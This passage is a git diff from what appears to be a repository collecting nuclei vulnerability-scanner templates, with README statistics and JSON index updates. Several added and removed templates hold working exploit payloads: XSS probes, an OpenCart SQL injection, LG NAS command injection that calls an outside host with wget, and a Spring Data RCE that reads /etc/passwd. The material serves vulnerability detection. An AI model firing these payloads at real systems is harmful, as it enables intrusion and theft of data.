CVE-2014 | 46 | -| CVE-2015 | 47 | -| CVE-2016 | 38 | +| CVE-2014 | 43 | +| CVE-2015 | 44 | +| CVE-2016 | 40 | | CVE-2017 | 95 | -| CVE-2018 | 247 | -| CVE-2019 | 414 | -| CVE-2020 | 763 | -| CVE-2021 | 852 | -| CVE-2022 | 862 | -| CVE-2023 | 754 | -| CVE-2024 | 361 | -| Other | 14333 | -| wordpress | 31513 | +| CVE-2018 | 251 | +| CVE-2019 | 413 | +| CVE-2020 | 759 | +| CVE-2021 | 847 | +| CVE-2022 | 861 | +| CVE-2023 | 757 | +| CVE-2024 | 363 | +| Other | 14365 | +| wordpress | 31514 | ## 近几天数量变化情况 -|2024-12-17 | 2024-12-18 | 2024-12-19 | 2024-12-20 | 2024-12-21 | 2024-12-22 | 2024-12-23| +|2024-12-18 | 2024-12-19 | 2024-12-20 | 2024-12-21 | 2024-12-22 | 2024-12-23 | 2024-12-24| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|50035 | 50036 | 50099 | 50132 | 50522 | 50559 | 50566| +|50036 | 50099 | 50132 | 50522 | 50559 | 50566 | 50593| ## 最近新增文件 | templates name | | --- | -| cve-2021-39320-6336.yaml | -| CVE-2024-11852.yaml | -| CVE-2011-4624-2078.yaml | -| cve-2021-21389-5514.yaml | -| CVE-2021-24340-5712.yaml | -| CVE-2021-25063-5794.yaml | -| cve-2017-1000170-2838.yaml | -| 674281011.yaml | -| api-jotform.yaml | -| 1559456844.yaml | -| 3886731892.yaml | -| 3742541433.yaml | -| 4066336974.yaml | -| 793310164.yaml | -| 3118163025.yaml | -| 3757448285.yaml | -| 1310750304.yaml | -| 2389937585.yaml | -| 1204339477.yaml | -| 1529097781.yaml | -| 372323483.yaml | -| 4116145651.yaml | -| 3274768380.yaml | -| 944179109.yaml | -| 2912151193.yaml | -| CVE-2024-55956.yaml | -| CVE-2024-52875.yaml | +| cve-2015-5471-2560.yaml | +| cve-2016-1000135-2685.yaml | +| CVE-2013-2287-2244.yaml | +| cve-2021-24406-5737.yaml | +| CVE-2024-11230.yaml | +| CVE-2012-1835-2171.yaml | +| CVE-2016-1000134-2680.yaml | +| 2201212761.yaml | +| tiki.yaml | +| fortigate-certificate.yaml | +| ack-cluster-network-policies-missing.yaml | +| 1668989849.yaml | +| 2545972775.yaml | +| ricoh-webimagemonitor-panel.yaml | +| 1697450874.yaml | +| ack-cluster-api-public.yaml | +| alibaba-cloud-code-env.yaml | +| oos-bucket-public-access.yaml | +| sse-cmk-disabled.yaml | +| easycvr-arbitrary-file-read.yaml | +| cleo-detect.yaml | +| 1896063946.yaml | +| 1983841135.yaml | +| 1790635368.yaml | +| ack-cluster-network-policies-disable.yaml | +| infinitt-pacs-info-leak.yaml | +| fortiwifi-certificate.yaml | +| fortianalyzer-certificate.yaml | +| 688202040.yaml | +| infinitt-pacs-file-upload.yaml | +| access-logoss-disabled.yaml | +| kubernetes-dashboard-enabled.yaml | +| limit-networkaccess-disabled.yaml | +| onedev.yaml | +| 1973925380.yaml | +| 2360956852.yaml | +| improper-bucket-sse.yaml | +| fortiauthenticator.yaml | +| secure-transfeross-disabled.yaml | +| ack-cluster-auditing-disable.yaml | +| public-actiontrail-bucket.yaml | +| fortimanager-certificate.yaml | +| ack-cluster-cloud-monitor-disable.yaml | +| 1976842637.yaml | +| openobserve-panel.yaml | +| 2022658175.yaml | +| sse-smk-disabled.yaml | +| ack-cluster-health-disable.yaml | +| fortiddos.yaml | +| CVE-2024-11303.yaml | +| CVE-2024-8859.yaml | diff --git a/data.json b/data.json index dd5d04e282..0e4a7b70c9 100644 --- a/data.json +++ b/data.json @@ -289,5 +289,6 @@ "2024-12-20": 50132, "2024-12-21": 50522, "2024-12-22": 50559, - "2024-12-23": 50566 + "2024-12-23": 50566, + "2024-12-24": 50593 } \ No newline at end of file diff --git a/data1.json b/data1.json index 3db2a583b3..f184f3180c 100644 --- a/data1.json +++ b/data1.json @@ -61565,5 +61565,56 @@ "944179109.yaml": "2024-12-23 02:32:38", "2912151193.yaml": "2024-12-23 02:32:38", "CVE-2024-55956.yaml": "2024-12-23 02:32:38", - "CVE-2024-52875.yaml": "2024-12-23 02:32:38" + "CVE-2024-52875.yaml": "2024-12-23 02:32:38", + "cve-2015-5471-2560.yaml": "2024-12-24 02:32:16", + "cve-2016-1000135-2685.yaml": "2024-12-24 02:32:16", + "CVE-2013-2287-2244.yaml": "2024-12-24 02:32:16", + "cve-2021-24406-5737.yaml": "2024-12-24 02:32:16", + "CVE-2024-11230.yaml": "2024-12-24 02:32:16", + "CVE-2012-1835-2171.yaml": "2024-12-24 02:32:16", + "CVE-2016-1000134-2680.yaml": "2024-12-24 02:32:16", + "2201212761.yaml": "2024-12-24 02:32:16", + "tiki.yaml": "2024-12-24 02:32:16", + "fortigate-certificate.yaml": "2024-12-24 02:32:16", + "ack-cluster-network-policies-missing.yaml": "2024-12-24 02:32:16", + "1668989849.yaml": "2024-12-24 02:32:16", + "2545972775.yaml": "2024-12-24 02:32:16", + "ricoh-webimagemonitor-panel.yaml": "2024-12-24 02:32:16", + "1697450874.yaml": "2024-12-24 02:32:16", + "ack-cluster-api-public.yaml": "2024-12-24 02:32:16", + "alibaba-cloud-code-env.yaml": "2024-12-24 02:32:16", + "oos-bucket-public-access.yaml": "2024-12-24 02:32:16", + "sse-cmk-disabled.yaml": "2024-12-24 02:32:16", + "easycvr-arbitrary-file-read.yaml": "2024-12-24 02:32:16", + "cleo-detect.yaml": "2024-12-24 02:32:16", + "1896063946.yaml": "2024-12-24 02:32:16", + "1983841135.yaml": "2024-12-24 02:32:16", + "1790635368.yaml": "2024-12-24 02:32:16", + "ack-cluster-network-policies-disable.yaml": "2024-12-24 02:32:16", + "infinitt-pacs-info-leak.yaml": "2024-12-24 02:32:16", + "fortiwifi-certificate.yaml": "2024-12-24 02:32:16", + "fortianalyzer-certificate.yaml": "2024-12-24 02:32:16", + "688202040.yaml": "2024-12-24 02:32:16", + "infinitt-pacs-file-upload.yaml": "2024-12-24 02:32:16", + "access-logoss-disabled.yaml": "2024-12-24 02:32:16", + "kubernetes-dashboard-enabled.yaml": "2024-12-24 02:32:16", + "limit-networkaccess-disabled.yaml": "2024-12-24 02:32:16", + "onedev.yaml": "2024-12-24 02:32:16", + "1973925380.yaml": "2024-12-24 02:32:16", + "2360956852.yaml": "2024-12-24 02:32:16", + "improper-bucket-sse.yaml": "2024-12-24 02:32:16", + "fortiauthenticator.yaml": "2024-12-24 02:32:16", + "secure-transfeross-disabled.yaml": "2024-12-24 02:32:16", + "ack-cluster-auditing-disable.yaml": "2024-12-24 02:32:16", + "public-actiontrail-bucket.yaml": "2024-12-24 02:32:16", + "fortimanager-certificate.yaml": "2024-12-24 02:32:16", + "ack-cluster-cloud-monitor-disable.yaml": "2024-12-24 02:32:16", + "1976842637.yaml": "2024-12-24 02:32:16", + "openobserve-panel.yaml": "2024-12-24 02:32:16", + "2022658175.yaml": "2024-12-24 02:32:16", + "sse-smk-disabled.yaml": "2024-12-24 02:32:16", + "ack-cluster-health-disable.yaml": "2024-12-24 02:32:16", + "fortiddos.yaml": "2024-12-24 02:32:16", + "CVE-2024-11303.yaml": "2024-12-24 02:32:16", + "CVE-2024-8859.yaml": "2024-12-24 02:32:16" } \ No newline at end of file diff --git a/nuclei-templates/CVE-2001/CVE-2001-1473.yaml b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml new file mode 100644 index 0000000000..a3f21c8969 --- /dev/null +++ b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml @@ -0,0 +1,20 @@ +id: deprecated-sshv1-detection + +info: + name: Deprecated SSHv1 Protocol Detection + author: iamthefrogy + severity: medium + tags: network,ssh,openssh + description: SSHv1 is a deprecated and have known cryptographic issues. + reference: | + - https://www.kb.cert.org/vuls/id/684820 + - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}:22" + matchers: + - type: word + words: + - "SSH-1" diff --git a/nuclei-templates/CVE-2001/cve-2001-1473.yaml b/nuclei-templates/CVE-2001/cve-2001-1473.yaml deleted file mode 100644 index 41b50fed4e..0000000000 --- a/nuclei-templates/CVE-2001/cve-2001-1473.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2001-1473 - -info: - name: Deprecated SSHv1 Protocol Detection - author: iamthefrogy - severity: high - tags: network,ssh,openssh,cves,cves2001 - description: SSHv1 is deprecated and has known cryptographic issues. - remediation: Upgrade to SSH 2.4 or later. - reference: - - https://www.kb.cert.org/vuls/id/684820 - - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - classification: - cvss-score: 7.4 - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N - cve-id: CVE-2001-1473 - cwe-id: CWE-310 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: word - words: - - "SSH-1" - -# Updated by Chris on 2022/01/21 diff --git a/nuclei-templates/CVE-2004/CVE-2004-0519.yaml b/nuclei-templates/CVE-2004/CVE-2004-0519.yaml deleted file mode 100644 index 86da54f93e..0000000000 --- a/nuclei-templates/CVE-2004/CVE-2004-0519.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2004-0519 - -info: - name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." - reference: https://www.exploit-db.com/exploits/24068 - tags: xss,squirrelmail,cve2004,cve - -requests: - - method: GET - path: - - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2004/cve-2004-0519.yaml b/nuclei-templates/CVE-2004/cve-2004-0519.yaml new file mode 100644 index 0000000000..d732d1a529 --- /dev/null +++ b/nuclei-templates/CVE-2004/cve-2004-0519.yaml @@ -0,0 +1,37 @@ +id: CVE-2004-0519 + +info: + name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + remediation: Upgrade to the latest version. + reference: + - https://www.exploit-db.com/exploits/24068 + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + tags: xss,squirrelmail,cve2004,cve + classification: + cve-id: CVE-2004-0519 + +requests: + - method: GET + path: + - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml deleted file mode 100644 index c74c52c360..0000000000 --- a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2005-2428 -info: - name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure - author: CasperGN - severity: medium - tags: cve,cve2005,domino - description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). - remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. - reference: - - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - - https://www.exploit-db.com/exploits/39495 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2005-2428 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/names.nsf/People?OpenView" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - name: domino-username - regex: - - '(" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-10093.yaml b/nuclei-templates/CVE-2018/CVE-2018-10093.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10093.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10093.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml deleted file mode 100644 index feadcb357a..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2018-10230 - -info: - name: Zend Server <9.13 - Cross-Site Scripting - author: marcos_iaf - severity: medium - description: | - Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. - reference: - - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - - https://www.zend.com/en/products/server/release-notes - - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-10230 - cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46318 - cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zend - product: zend_server - tags: cve,cve2018,xss,zend - -http: - - method: GET - path: - - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "is not allowed to open debug sessions" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-10818.yaml b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml new file mode 100644 index 0000000000..2dc224d38d --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-10818 + +info: + name: LG NAS Devices - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + reference: + - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ + - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 + tags: cve,cve2018,lg-nas,rce,oast,injection + +requests: + - raw: + - | + POST /system/sharedir.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &uid=10; wget http://{{interactsh-url}} + + - | + POST /en/php/usb_sync.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &act=sync&task_number=1;wget http://{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10956.yaml b/nuclei-templates/CVE-2018/CVE-2018-10956.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10956.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10956.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml deleted file mode 100644 index 0245c2a8a3..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2018-11231 - -info: - name: Opencart Divido - Sql Injection - author: ritikchaddha - severity: high - description: | - OpenCart Divido plugin is susceptible to SQL injection - impact: | - This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system. - remediation: | - Apply the official patch or upgrade to a version that includes the fix. - reference: - - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - - http://foreversong.cn/archives/1183 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2018-11231 - cwe-id: CWE-89 - epss-score: 0.00903 - epss-percentile: 0.82368 - cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* - metadata: - max-request: 1 - vendor: divido - product: divido - framework: opencart - tags: cve,cve2018,opencart,sqli,intrusive,divido -variables: - num: "999999999" - -http: - - raw: - - | - POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 - Host: {{Hostname}} - - {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{md5({{num}})}}" - - - type: status - status: - - 200 -# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml new file mode 100644 index 0000000000..361494985c --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-11709 +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-11709 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12296.yaml b/nuclei-templates/CVE-2018/CVE-2018-12296.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12296.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12296.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12300.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12300.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12613.yaml b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12613.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12613.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1273.yaml b/nuclei-templates/CVE-2018/CVE-2018-1273.yaml new file mode 100644 index 0000000000..46a3d307c6 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1273.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-1273 + +info: + name: Spring Data Commons Unauthenticated RCE + author: dwisiswant0 + severity: critical + description: | + Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, + and older unsupported versions, contain a property binder vulnerability + caused by improper neutralization of special elements. + An unauthenticated remote malicious user (or attacker) can supply + specially crafted request parameters against Spring Data REST backed HTTP resources + or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 + tags: cve,cve2018,vmware,rce,spring + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 + +requests: + - raw: + - | + POST /account HTTP/1.1 + Host: {{Hostname}} + Connection: close + Content-Type: application/x-www-form-urlencoded + + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + + payloads: + command: + - "cat /etc/passwd" + - "type C:\\/Windows\\/win.ini" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-1335.yaml b/nuclei-templates/CVE-2018/CVE-2018-1335.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1335.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1335.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-13379.yaml b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-13379.yaml rename to nuclei-templates/CVE-2018/CVE-2018-13379.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-14912.yaml b/nuclei-templates/CVE-2018/CVE-2018-14912.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14912.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14912.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15138.yaml b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15138.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15138.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15745.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16283.yaml b/nuclei-templates/CVE-2018/CVE-2018-16283.yaml index 5da2280652..4c485ff4b7 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16283.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16283.yaml @@ -4,16 +4,18 @@ info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: critical + description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://www.exploit-db.com/exploits/45438 - tags: cve,cve2018,wordpress,wp-plugin,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 + - http://seclists.org/fulldisclosure/2018/Sep/32 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter." + tags: cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET @@ -25,3 +27,5 @@ requests: regex: - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16670.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16670.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16761.yaml b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml deleted file mode 100644 index 23f9df48fa..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16761.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-16761 - -info: - name: Eventum <3.4.0 - Open Redirect - author: 0x_Akoko - severity: medium - description: | - Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. - reference: - - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - - https://github.com/eventum/eventum/releases/tag/v3.4.0 - - https://nvd.nist.gov/vuln/detail/CVE-2018-16761 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-16761 - cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 - cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: eventum_project - product: eventum - tags: cve,cve2018,redirect,eventum,oss,eventum_project - -http: - - method: GET - path: - - '{{BaseURL}}/select_project.php?url=http://interact.sh' - - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh' - - stop-at-first-match: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-17207.yaml b/nuclei-templates/CVE-2018/CVE-2018-17207.yaml new file mode 100644 index 0000000000..d96354bf31 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-17207.yaml @@ -0,0 +1,58 @@ +id: CVE-2018-17207 + +info: + name: > + Duplicator <= 1.2.41 - Sensitive Information Disclosure leading to Remote Code Execution + author: topscoder + severity: critical + description: > + An issue was discovered in Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aff754d6-8624-4068-8e31-738f6041d3a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-17207 + metadata: + fofa-query: "wp-content/plugins/duplicator/" + google-query: inurl:"/wp-content/plugins/duplicator/" + shodan-query: 'vuln:CVE-2018-17207' + tags: cve,wordpress,wp-plugin,duplicator,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "duplicator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.40') \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-17254.yaml b/nuclei-templates/CVE-2018/CVE-2018-17254.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17254.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17254.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml deleted file mode 100644 index 28743e3369..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2018-17422 - -info: 